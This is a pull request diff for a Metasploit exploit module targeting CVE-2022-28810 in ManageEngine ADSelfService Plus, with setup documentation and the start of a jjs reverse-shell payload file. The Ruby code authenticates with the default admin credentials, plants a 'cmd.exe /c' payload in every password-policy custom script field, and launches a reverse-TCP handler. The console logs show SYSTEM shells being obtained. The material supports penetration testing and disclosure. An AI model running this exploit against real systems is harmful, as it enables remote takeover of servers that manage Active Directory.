### PR TITLE
ManageEngine ADSelfService Plus Authenticated RCE (CVE-2022-28810)

### DIFF
--- a/documentation/modules/exploit/windows/http/manageengine_adselfservice_plus_cve_2022_28810.md
+++ b/documentation/modules/exploit/windows/http/manageengine_adselfservice_plus_cve_2022_28810.md
@@ -1,0 +1,268 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits the "custom script" feature of ADSelfService Plus. The
+feature was removed in build 6122 as part of the patch for CVE-2022-28810.
+For purposes of this module, a "custom script" is arbitrary operating system
+command execution. As written, this module uses `cmd.exe` to execute `jjs.exe`
+and retrieve a reverse shell.
+
+This module uses an attacker provided "admin" account to insert the malicious
+payload into the custom script fields. When a user resets their password or
+unlocks their account, the payload in the custom script will be executed.
+The payload will be executed as SYSTEM if ADSelfService Plus is installed as
+a service, which we believe is the normal operational behavior.
+
+This is a passive module because user interaction is required to trigger the
+payload. This module also does not automatically remove the malicious code from
+the remote target. Use the "TARGET_RESET" operation to remove the malicious
+custom script when you are done.
+
+ADSelfService Plus uses default credentials of "admin":"admin"
+
+### Setup
+
+Follow the [Getting Started] guide. You will need an AD environment and at least two
+accounts: an AD admin for ADSelfService Plus and a test account to enroll in the
+service. The service runs on Windows (any it seems - I tested on Windows 10), so
+you'll need that.
+
+1. Prepare a Windows environment to install on.
+1. Download [ManageEngine_ADSelfService_Plus_64bit.exe] build 6121
+1. Run the installer (skip registeration). Do **not** "Start ADSelfService Plus in console mode".
+1. Run the service installer (start menu -> "Install ADSelfService Plus as Service")
+1. Start the service (services -> "ManageEngine ADSelfService Plus")
+1. Nagivate to the web server: http://localhost:8888 (may take a few minutes to load)
+1. Log in as "admin" (password: admin)
+1. Connect the AD DC: enter the domain name and hit discover. Provide credentials when prompted.
+1. Enroll users via "Configuration" -> "Administration Tools" -> "Quick Enrollment" ->
+"Import Users from CSV". Download the "sample.csv, edit it with your test user and
+upload it." Also use "Import" -> "Answer" in the drop down.
+1. Logout from the admin account and log in as the newly enrolled user to configure
+the secret question responses. Once completed the test user should be fully enrolled
+and ready for hax.
+1. You may need to open up port 8888 on the firewall. I've encountered ADSSP forgetting to do so.
+
+[Getting Started]: https://www.manageengine.com/products/self-service-password/help/admin-guide/gettingstarted/getting-started.html
+[ManageEngine_ADSelfService_Plus_64bit.exe]: https://archives2.manageengine.com/self-service-password/6121/ManageEngine_ADSelfService_Plus_64bit.exe
+
+## Verification Steps
+
+* Follow setup steps above.
+* Do: `use exploit/windows/http/manageengine_adselfservice_plus_cve_2022_28810`
+* Do: `set RHOST <ip>`
+* Do: `set LHOST <ip>`
+* Do: `check`
+* Verify the remote host is vulnerable.
+* Do: `run`
+* Verify the module is waiting for a reverse TCP connection
+* Navigate to the ADSelfService Plus web UI and reset your test users password.
+* After a new password has been set verify the module received a reverse shell.
+* Exit the shell
+* Do `set TARGET_RESET true`
+* Do `run`
+* Navigate to the ADSelfService Plus web UI, log in as admin, and verify that the custom
+scripts have been removed and disabled ("Configuration" -> "Self Service" ->
+"Policy Configuration" -> "Advanced" -> "Password Sync")
+
+## Options
+
+### USERNAME
+
+The ManageEngine ADSelfService Plus administrator's username ("admin" by default).
+
+### PASSWORD
+
+The ManageEngine ADSelfService Plus administrator's password ("admin" by default).
+
+### JJS_PATH
+
+The path to `jjs.exe`. Custom scripts use a working directory of the ADSelfService Plus
+`/bin/` directory, so `jjs.exe` should be found up one directory and down into the Java
+installation packaged with ADSelfService Plus. This script defaults the value to
+`..\\jre\\bin\\jjs.exe`.
+
+## TARGET_RESET
+
+If set to true, instead of dropping a payload into the custom scripts fields, the module
+will disable custom scripts and clear the custom scripts field. If set to false, the module
+will enable custom scripts and insert the configured payload.
+
+## Scenarios
+
+### Successful exploitation of ADSelfService Plus 6121 on Windows 10 over HTTP
+
+```
+msf6 > use exploit/windows/http/manageengine_adselfservice_plus_cve_2022_28810
+[*] Using configured payload cmd/windows/jjs_reverse_tcp
+msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > set RHOST 10.0.0.20
+RHOST => 10.0.0.20
+msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > set LHOST 10.0.0.2
+LHOST => 10.0.0.2
+msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > check
+[*] 10.0.0.20:8888 - The target appears to be vulnerable. This determination is based on the version string: 6121.
+msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > run
+[*] Exploit running as background job 0.
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > [+] The target appears to be vulnerable. This determination is based on the version string: 6121.
+[+] Authentication successful
+[*] Requesting policy list from /ServletAPI/configuration/policyConfig/getPolicyConfigDetails
+[*] Requesting policy details for okhuman.ninja
+[*] Enabling custom scripts and inserting the payload
+[*] Posting updated policy configuration to /ServletAPI/configuration/policyConfig/setAPCDetails
+[*] Starting exploit/multi/handler
+[*] Started reverse TCP handler on 10.0.0.2:4444 
+
+msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > 
+msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > 
+msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > [*] Command shell session 1 opened (10.0.0.2:4444 -> 10.0.0.20:49940 ) at 2022-04-19 08:47:28 -0700
+
+msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > sessions 1
+[*] Starting interaction with 1...
+
+
+Shell Banner:
+M
+-----
+          
+
+C:\ManageEngine\ADSelfService Plus\bin>whoami
+whoami
+nt authority\system
+```
+
+### Failed log in
+
+```
+sf6 > use exploit/windows/http/manageengine_adselfservice_plus_cve_2022_28810
+[*] Using configured payload cmd/windows/jjs_reverse_tcp
+msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > set RHOST 10.0.0.20
+RHOST => 10.0.0.20
+msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > set LHOST 10.0.0.2
+LHOST => 10.0.0.2
+msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > set PASSWORD lolwat
+PASSWORD => lolwat
+msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > run
+[*] Exploit running as background job 0.
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > [+] The target appears to be vulnerable. This determination is based on the version string: 6121.
+[-] Exploit aborted due to failure: no-access: Log in attempt failed
+
+msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > 
+```
+
+### Failed exploitation of patched ADSelfService Plus build 6122
+
+```
+msf6 > use exploit/windows/http/manageengine_adselfservice_plus_cve_2022_28810
+[*] Using configured payload cmd/windows/jjs_reverse_tcp
+msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > set RHOST 10.0.0.16
+RHOST => 10.0.0.16
+msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > set LHOST 10.0.0.2
+LHOST => 10.0.0.2
+msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > run
+[*] Exploit running as background job 0.
+
+msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > [*] Running automatic check ("set AutoCheck false" to disable)
+[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. This determination is based on the version string: 6122. "set ForceExploit true" to override check result.
+
+msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > 
+```
+
+### Successful exploitation of ADSelfService Plus 6121 on Windows 10 over HTTPs (9251 is default when configured)
+
+```
+msf6 > use exploit/windows/http/manageengine_adselfservice_plus_cve_2022_28810
+[*] Using configured payload cmd/windows/jjs_reverse_tcp
+msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > set SSL true
+[!] Changing the SSL option's value may require changing RPORT!
+SSL => true
+msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > set RPORT 9251
+RPORT => 9251
+msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > set RHOST 10.0.0.20
+RHOST => 10.0.0.20
+msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > set LHOST 10.0.0.2
+LHOST => 10.0.0.2
+msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > check
+[*] 10.0.0.20:9251 - The target appears to be vulnerable. This determination is based on the version string: 6121.
+msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > run
+[*] Exploit running as background job 0.
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > [+] The target appears to be vulnerable. This determination is based on the version string: 6121.
+[+] Authentication successful
+[*] Requesting policy list from /ServletAPI/configuration/policyConfig/getPolicyConfigDetails
+[*] Requesting policy details for okhuman.ninja
+[*] Enabling custom scripts and inserting the payload
+[*] Posting updated policy configuration to /ServletAPI/configuration/policyConfig/setAPCDetails
+[*] Starting exploit/multi/handler
+[*] Started reverse TCP handler on 10.0.0.2:4444 
+[*] Command shell session 1 opened (10.0.0.2:4444 -> 10.0.0.20:50035 ) at 2022-04-19 09:10:37 -0700
+
+msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > sessions 1
+[*] Starting interaction with 1...
+
+
+Shell Banner:
+Microsoft
+-----
+          
+
+C:\ManageEngine\ADSelfService Plus\bin>whoami
+whoami
+nt authority\system
+```
+
+### Successful exploitation of ADSelfService Plus 6121 on Windows 10 over HTTP for a powershell reverse shell
+
+```
+msf6 > use exploit/windows/http/manageengine_adselfservice_plus_cve_2022_28810
+[*] Using configured payload cmd/windows/jjs_reverse_tcp
+msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > set RHOST 10.0.0.20
+RHOST => 10.0.0.20
+msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > set LHOST 10.0.0.2
+LHOST => 10.0.0.2
+msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > set SHELL powershell.exe
+SHELL => powershell.exe
+msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > run
+[*] Exploit running as background job 0.
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > [-] Exploit aborted due to failure: unknown: Cannot reliably check exploitability. The target failed to respond to check. "set ForceExploit true" to override check result.
+
+msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > run
+[*] Exploit running as background job 1.
+
+msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > [*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. This determination is based on the version string: 6121.
+[+] Authentication successful
+[*] Requesting policy list from /ServletAPI/configuration/policyConfig/getPolicyConfigDetails
+[*] Requesting policy details for okhuman.ninja
+[*] Enabling custom scripts and inserting the payload
+[*] Posting updated policy configuration to /ServletAPI/configuration/policyConfig/setAPCDetails
+[*] Starting exploit/multi/handler
+[*] Started reverse TCP handler on 10.0.0.2:4444 
+[*] Command shell session 1 opened (10.0.0.2:4444 -> 10.0.0.20:50060 ) at 2022-04-19 10:15:20 -0700
+
+msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > sessions 1
+[*] Starting interaction with 1...
+
+
+PS C:\ManageEngine\ADSelfService Plus\bin> id
+id
+id : The term 'id' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the 
+spelling of the name, or if a path was included, verify that the path is correct and try again.
+At line:1 char:1
++ id
++ ~~
+    + CategoryInfo          : ObjectNotFound: (id:String) [], CommandNotFoundException
+    + FullyQualifiedErrorId : CommandNotFoundException
+ 
+PS C:\ManageEngine\ADSelfService Plus\bin> whoami
+whoami
+nt authority\system
+PS C:\ManageEngine\ADSelfService Plus\bin> 
+```

--- a/documentation/modules/exploit/windows/http/manageengine_adselfservice_plus_cve_2022_28810.md
+++ b/documentation/modules/exploit/windows/http/manageengine_adselfservice_plus_cve_2022_28810.md
@@ -5,8 +5,7 @@
 This module exploits the "custom script" feature of ADSelfService Plus. The
 feature was removed in build 6122 as part of the patch for CVE-2022-28810.
 For purposes of this module, a "custom script" is arbitrary operating system
-command execution. As written, this module uses `cmd.exe` to execute `jjs.exe`
-and retrieve a reverse shell.
+command execution.
 
 This module uses an attacker provided "admin" account to insert the malicious
 payload into the custom script fields. When a user resets their password or
@@ -75,13 +74,6 @@ The ManageEngine ADSelfService Plus administrator's username ("admin" by default
 ### PASSWORD
 
 The ManageEngine ADSelfService Plus administrator's password ("admin" by default).
-
-### JJS_PATH
-
-The path to `jjs.exe`. Custom scripts use a working directory of the ADSelfService Plus
-`/bin/` directory, so `jjs.exe` should be found up one directory and down into the Java
-installation packaged with ADSelfService Plus. This script defaults the value to
-`..\\jre\\bin\\jjs.exe`.
 
 ## TARGET_RESET
 

--- a/modules/exploits/windows/http/manageengine_adselfservice_plus_cve_2022_28810.rb
+++ b/modules/exploits/windows/http/manageengine_adselfservice_plus_cve_2022_28810.rb
@@ -1,0 +1,307 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'ManageEngine ADSelfService Plus Custom Script Execution',
+        'Description' => %q{
+          This module exploits the "custom script" feature of ADSelfService Plus. The
+          feature was removed in build 6122 as part of the patch for CVE-2022-28810.
+          For purposes of this module, a "custom script" is arbitrary operating system
+          command execution. As written, this module uses `cmd.exe` to execute `jjs.exe`
+          and retrieve a reverse shell.
+
+          This module uses an attacker provided "admin" account to insert the malicious
+          payload into the custom script fields. When a user resets their password or
+          unlocks their account, the payload in the custom script will be executed.
+          The payload will be executed as SYSTEM if ADSelfService Plus is installed as
+          a service, which we believe is the normal operational behavior.
+
+          This is a passive module because user interaction is required to trigger the
+          payload. This module also does not automatically remove the malicious code from
+          the remote target. Use the "TARGET_RESET" operation to remove the malicious
+          custom script when you are done.
+
+          ADSelfService Plus uses default credentials of "admin":"admin"
+        },
+        'Author' => [
+          # Discovered and exploited by unknown threat actors
+          'Jake Baines', # Analysis, CVE credit, and Metasploit module
+          'Hernan Diaz', # Analysis and CVE credit
+          'Andrew Iwamaye', # Analysis and CVE credit
+          'Dan Kelley' # Analysis and CVE credit
+        ],
+        'References' => [
+          ['CVE', '2022-28810'],
+          ['URL', 'https://www.manageengine.com/products/self-service-password/kb/cve-2022-28810.html'],
+          ['URL', 'https://www.rapid7.com/blog/post/2022/04/14/cve-2022-28810-manageengine-adselfservice-plus-authenticated-command-execution-fixed/']
+        ],
+        'DisclosureDate' => '2022-04-09',
+        'License' => MSF_LICENSE,
+        'Platform' => 'win',
+        'Arch' => ARCH_CMD,
+        'Privileged' => true, # false if ADSelfService Plus is not run as a service
+        'Stance' => Msf::Exploit::Stance::Passive,
+        'Targets' => [
+          [
+            'jjs.exe in memory',
+            {
+              'Arch' => ARCH_CMD,
+              'Type' => :jjs_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/jjs_reverse_tcp'
+              }
+            }
+          ],
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 8888,
+          'DisablePayloadHandler' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Path traversal for auth bypass', '/']),
+      OptString.new('USERNAME', [true, 'The administrator username', 'admin']),
+      OptString.new('PASSWORD', [true, 'The administrator user\'s password', 'admin']),
+      OptString.new('JJS_PATH', [ true, 'The path to JJS', '..\\jre\\bin\\jjs.exe' ]),
+      OptBool.new('TARGET_RESET', [true, 'On the target, disables custom scripts and clears custom script field', false])
+    ])
+  end
+
+  ##
+  # Because this is an authenticated vulnerability, we will rely on a version string
+  # for the check function. We can extract the version (or build) from selfservice/index.html.
+  ##
+  def check
+    res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/selfservice/index.html'))
+    unless res
+      return CheckCode::Unknown('The target failed to respond to check.')
+    end
+
+    unless res.code == 200
+      return CheckCode::Safe('Failed to retrieve /selfservice/index.html')
+    end
+
+    ver = res.body[/\.css\?buildNo=(?<build_id>[0-9]+)/, :build_id]
+    if ver.nil?
+      return CheckCode::Safe('Could not extract a version number')
+    end
+
+    if Rex::Version.new(ver) < Rex::Version.new('6122')
+      return CheckCode::Appears("This determination is based on the version string: #{ver}.")
+    end
+
+    CheckCode::Safe("This determination is based on the version string: #{ver}.")
+  end
+
+  ##
+  # Authenticate with the remote target. Login requires four steps:
+  #
+  # 1. Grab a CSRF token
+  # 2. Post credentials to /ServletAPI/accounts/login
+  # 3. Post credentials to /j_security_check
+  # 4. Grab another CSRF token for authenticated requests
+  #
+  # @return a new CSRF token to use with authenticated requests
+  ##
+  def authenticate
+    # grab a CSRF token from the index
+    res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/authorization.do') })
+    fail_with(Failure::Unreachable, 'The target did not respond') unless res
+    fail_with(Failure::UnexpectedReply, 'Failed to grab a CSRF token') if res.get_cookies_parsed.empty? || res.get_cookies_parsed['HttpOnly, adscsrf'].empty?
+    csrf_tok = res.get_cookies_parsed['HttpOnly, adscsrf'].to_s[/HttpOnly, adscsrf=(?<token>[0-9a-f-]+); path=/, :token]
+    fail_with(Failure::UnexpectedReply, 'Failed to grab a CSRF token') unless csrf_tok
+
+    # send the first login request to get the ssp token
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/ServletAPI/accounts/login'),
+      'keep_cookies' => true,
+      'vars_post' =>
+      {
+        'loginName' => datastore['USERNAME'],
+        'domainName' => 'ADSelfService Plus Authentication',
+        'j_username' => datastore['USERNAME'],
+        'j_password' => datastore['PASSWORD'],
+        'AUTHRULE_NAME' => 'ADAuthenticator',
+        'adscsrf' => csrf_tok
+      }
+    })
+    fail_with(Failure::NoAccess, 'Log in attempt failed') unless res.code == 200
+
+    # send the second login request to get the sso token
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/j_security_check'),
+      'keep_cookies' => true,
+      'vars_post' =>
+      {
+        'loginName' => datastore['USERNAME'],
+        'domainName' => 'ADSelfService Plus Authentication',
+        'j_username' => datastore['USERNAME'],
+        'j_password' => datastore['PASSWORD'],
+        'AUTHRULE_NAME' => 'ADAuthenticator',
+        'adscsrf' => csrf_tok
+      }
+    })
+    fail_with(Failure::NoAccess, 'Log in attempt failed') unless res.code == 302
+
+    # revisit authorization.do to complete authentication
+    res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/authorization.do'), 'keep_cookies' => true })
+    fail_with(Failure::NoAccess, 'Log in attempt failed') unless res.code == 200
+    fail_with(Failure::UnexpectedReply, 'Failed to grab a CSRF token') if res.get_cookies_parsed.empty? || res.get_cookies_parsed['adscsrf'].empty?
+    csrf_tok = res.get_cookies_parsed['adscsrf'].to_s[/adscsrf=(?<token>[0-9a-f-]+);/, :token]
+    fail_with(Failure::UnexpectedReply, 'Failed to grab a CSRF token') unless csrf_tok
+
+    print_good('Authentication successful')
+    csrf_tok
+  end
+
+  ##
+  # Triggering the payload requires user interaction. Using the default payload
+  # handler will cause this module to exit after planting the payload, so the
+  # module will spawn it's own handler so that it doesn't exit until a shell
+  # has been received/handled. Note that this module is passive so it should
+  # just be chilling quietly in the background.
+  #
+  # This code is largely copy/paste from windows/local/persistence.rb
+  ##
+  def create_multihandler(lhost, lport, payload_name)
+    pay = framework.payloads.create(payload_name)
+    pay.datastore['LHOST'] = lhost
+    pay.datastore['LPORT'] = lport
+    print_status('Starting exploit/multi/handler')
+
+    # Set options for module
+    mh = framework.exploits.create('multi/handler')
+    mh.share_datastore(pay.datastore)
+    mh.datastore['PAYLOAD'] = payload_name
+    mh.datastore['EXITFUNC'] = 'thread'
+    mh.datastore['ExitOnSession'] = true
+    # Validate module options
+    mh.options.validate(mh.datastore)
+    # Execute showing output
+    mh.exploit_simple(
+      'Payload' => mh.datastore['PAYLOAD'],
+      'LocalInput' => user_input,
+      'LocalOutput' => user_output,
+      'RunAsJob' => true
+    )
+
+    # Check to make sure that the handler is actually valid
+    # If another process has the port open, then the handler will fail
+    # but it takes a few seconds to do so.  The module needs to give
+    # the handler time to fail or the resulting connections from the
+    # target could end up on on a different handler with the wrong payload
+    # or dropped entirely.
+    Rex.sleep(5)
+    return nil if framework.jobs[mh.job_id.to_s].nil?
+
+    return mh.job_id.to_s
+  end
+
+  def exploit
+    csrf_tok = authenticate
+
+    # Grab the list of configured policies
+    policy_list_uri = normalize_uri(target_uri.path, '/ServletAPI/configuration/policyConfig/getPolicyConfigDetails')
+    print_status("Requesting policy list from #{policy_list_uri}")
+    res = send_request_cgi({ 'method' => 'GET', 'uri' => policy_list_uri })
+    fail_with(Failure::UnexpectedReply, 'Log in attempt failed') unless res.code == 200
+    policy_json = res.get_json_document
+    fail_with(Failure::UnexpectedReply, "The target didn't return a JSON body") if policy_json.nil?
+    policy_details_json = policy_json['POLICY_DETAILS']
+    fail_with(Failure::UnexpectedReply, "The target didn't have any configured policies") if policy_details_json.nil?
+
+    # There can be multiple policies. This logic will loop over each one, grab the configuration
+    # details, update the configuration to include our payload, and then POST it back.
+    policy_details_json.each do |policy_entry|
+      policy_id = policy_entry['POLICY_ID']
+      policy_name = policy_entry['POLICY_NAME']
+      fail_with(Failure::UnexpectedReply, 'Policy details missing name or id') if policy_id.nil? || policy_name.nil?
+
+      print_status("Requesting policy details for #{policy_name}")
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, '/ServletAPI/configuration/policyConfig/getAPCDetails'),
+        'vars_get' =>
+        {
+          'POLICY_ID' => policy_id
+        }
+      })
+      fail_with(Failure::UnexpectedReply, 'Acquiring specific policy details failed') unless res.code == 200
+
+      # load the JSON and insert (or remove) our payload
+      specific_policy_json = res.get_json_document
+      fail_with(Failure::UnexpectedReply, "The target didn't return a JSON body") if specific_policy_json.nil?
+      fail_with(Failure::UnexpectedReply, "The target didn't contain the expected JSON") if specific_policy_json['SCRIPT_COMMAND_RESET'].nil?
+      new_payload = "cmd.exe /c #{payload.encoded}"
+
+      if datastore['TARGET_RESET']
+        print_status('Disabling custom script functionality')
+        specific_policy_json['IS_CUSTOM_SCRIPT_ENABLED_RESET'] = '0'
+        specific_policy_json['SCRIPT_COMMAND_RESET'] = ''
+        specific_policy_json['IS_CUSTOM_SCRIPT_ENABLED_UNLOCK'] = '0'
+        specific_policy_json['SCRIPT_COMMAND_UNLOCK'] = ''
+      else
+        print_status('Enabling custom scripts and inserting the payload')
+        specific_policy_json['IS_CUSTOM_SCRIPT_ENABLED_RESET'] = '1'
+        specific_policy_json['SCRIPT_COMMAND_RESET'] = new_payload
+        specific_policy_json['IS_CUSTOM_SCRIPT_ENABLED_UNLOCK'] = '1'
+        specific_policy_json['SCRIPT_COMMAND_UNLOCK'] = new_payload
+      end
+
+      # this is insane. the json blob that *ManageEngine* gives us has to be filtered in order
+      # to send it back to *ManageEngine* :scream: Specifically, ADSP is very unhappy about all
+      # the booleans using "true" or "false" instead of "1" or "0" *except* for HIDE_CAPTCHA_RPUA
+      # which has to remain a boolean. Sounds unbelievable, right? But here we are.
+      updated_policy = specific_policy_json.to_json
+      updated_policy = updated_policy.gsub('true', '1')
+      updated_policy = updated_policy.gsub('false', '0')
+      updated_policy = updated_policy.gsub('HIDE_CAPTCHA_RPUA":0', 'HIDE_CAPTCHA_RPUA":false')
+      updated_policy = updated_policy.gsub('HIDE_CAPTCHA_RPUA":1', 'HIDE_CAPTCHA_RPUA":true')
+      policy_update_uri = normalize_uri(target_uri.path, '/ServletAPI/configuration/policyConfig/setAPCDetails')
+      print_status("Posting updated policy configuration to #{policy_update_uri}")
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => policy_update_uri,
+        'vars_post' =>
+        {
+          'APC_SETTINGS_DETAILS' => updated_policy,
+          'POLICY_NAME' => policy_name,
+          'adscsrf' => csrf_tok
+        }
+      })
+      fail_with(Failure::UnexpectedReply, 'Policy update request failed') unless res.code == 200
+
+      # spawn our own payload handler?
+      if !datastore['TARGET_RESET'] && datastore['DisablePayloadHandler']
+        listener_job_id = create_multihandler(datastore['LHOST'], datastore['LPORT'], datastore['PAYLOAD'])
+        if listener_job_id.blank?
+          print_error("Failed to start exploit/multi/handler on #{datastore['LPORT']}, it may be in use by another process.")
+        end
+      else
+        print_good('Done!')
+      end
+    end
+  end
+end

--- a/modules/exploits/windows/http/manageengine_adselfservice_plus_cve_2022_28810.rb
+++ b/modules/exploits/windows/http/manageengine_adselfservice_plus_cve_2022_28810.rb
@@ -19,8 +19,7 @@ class MetasploitModule < Msf::Exploit::Remote
           This module exploits the "custom script" feature of ADSelfService Plus. The
           feature was removed in build 6122 as part of the patch for CVE-2022-28810.
           For purposes of this module, a "custom script" is arbitrary operating system
-          command execution. As written, this module uses `cmd.exe` to execute `jjs.exe`
-          and retrieve a reverse shell.
+          command execution.
 
           This module uses an attacker provided "admin" account to insert the malicious
           payload into the custom script fields. When a user resets their password or
@@ -55,10 +54,9 @@ class MetasploitModule < Msf::Exploit::Remote
         'Stance' => Msf::Exploit::Stance::Passive,
         'Targets' => [
           [
-            'jjs.exe in memory',
+            'Windows command',
             {
               'Arch' => ARCH_CMD,
-              'Type' => :jjs_cmd,
               'DefaultOptions' => {
                 'PAYLOAD' => 'cmd/windows/jjs_reverse_tcp'
               }
@@ -68,7 +66,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'DefaultTarget' => 0,
         'DefaultOptions' => {
           'RPORT' => 8888,
-          'DisablePayloadHandler' => true
+          'DisablePayloadHandler' => true,
+          'JJS_PATH' => '..\\jre\\bin\\jjs.exe'
         },
         'Notes' => {
           'Stability' => [CRASH_SAFE],
@@ -82,7 +81,6 @@ class MetasploitModule < Msf::Exploit::Remote
       OptString.new('TARGETURI', [true, 'Path traversal for auth bypass', '/']),
       OptString.new('USERNAME', [true, 'The administrator username', 'admin']),
       OptString.new('PASSWORD', [true, 'The administrator user\'s password', 'admin']),
-      OptString.new('JJS_PATH', [ true, 'The path to JJS', '..\\jre\\bin\\jjs.exe' ]),
       OptBool.new('TARGET_RESET', [true, 'On the target, disables custom scripts and clears custom script field', false])
     ])
   end
@@ -219,6 +217,35 @@ class MetasploitModule < Msf::Exploit::Remote
     return mh.job_id.to_s
   end
 
+  # The json policy blob that ADSSP provides us is not accepted by ADSSP
+  # if we try to POST it back. Specifically, ADSP is very unhappy about all
+  # the booleans using "true" or "false" instead of "1" or "0" *except* for
+  # HIDE_CAPTCHA_RPUA which has to remain a boolean. Sounds unbelievable, but
+  # here we are.
+  def fix_adssp_json(json_hash)
+    json_hash.map do |key, value|
+      if value.is_a? Hash
+        [key, fix_adssp_json(value)]
+      elsif value.is_a? Array
+        value = value.map do |array_val|
+          if array_val.is_a? Hash
+            array_val = fix_adssp_json(array_val)
+          end
+          array_val
+        end
+        [key, value]
+      elsif key == 'HIDE_CAPTCHA_RPUA'
+        [key, value]
+      elsif value.is_a? TrueClass
+        [key, 1]
+      elsif value.is_a? FalseClass
+        [key, 0]
+      else
+        [key, value]
+      end
+    end.to_h
+  end
+
   def exploit
     csrf_tok = authenticate
 
@@ -270,15 +297,9 @@ class MetasploitModule < Msf::Exploit::Remote
         specific_policy_json['SCRIPT_COMMAND_UNLOCK'] = new_payload
       end
 
-      # this is insane. the json blob that *ManageEngine* gives us has to be filtered in order
-      # to send it back to *ManageEngine* :scream: Specifically, ADSP is very unhappy about all
-      # the booleans using "true" or "false" instead of "1" or "0" *except* for HIDE_CAPTCHA_RPUA
-      # which has to remain a boolean. Sounds unbelievable, right? But here we are.
-      updated_policy = specific_policy_json.to_json
-      updated_policy = updated_policy.gsub('true', '1')
-      updated_policy = updated_policy.gsub('false', '0')
-      updated_policy = updated_policy.gsub('HIDE_CAPTCHA_RPUA":0', 'HIDE_CAPTCHA_RPUA":false')
-      updated_policy = updated_policy.gsub('HIDE_CAPTCHA_RPUA":1', 'HIDE_CAPTCHA_RPUA":true')
+      # fix up the ADSSP provided json so ADSSP will accept it o.O
+      updated_policy = fix_adssp_json(specific_policy_json).to_json
+
       policy_update_uri = normalize_uri(target_uri.path, '/ServletAPI/configuration/policyConfig/setAPCDetails')
       print_status("Posting updated policy configuration to #{policy_update_uri}")
       res = send_request_cgi({

--- a/modules/payloads/singles/cmd/windows/jjs_reverse_tcp.rb
+++ b/modules/payloads/singles/cmd/windows/jjs_reverse_tcp.rb
@@ -1,0 +1,73 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+module MetasploitModule
+  CachedSize = 863
+
+  include Msf::Payload::Single
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(
+      merge_info(
+        info,
+        'Name' => 'Unix Command Shell, Reverse TCP (via jjs)',
+        'Description' => 'Connect back and create a command shell via jjs',
+        'Author' => [
+          'conerpirate', # jjs reverse shell
+          'bcoles' # metasploit
+        ],
+        'References' => [
+          ['URL', 'https://gtfobins.github.io/gtfobins/jjs/'],
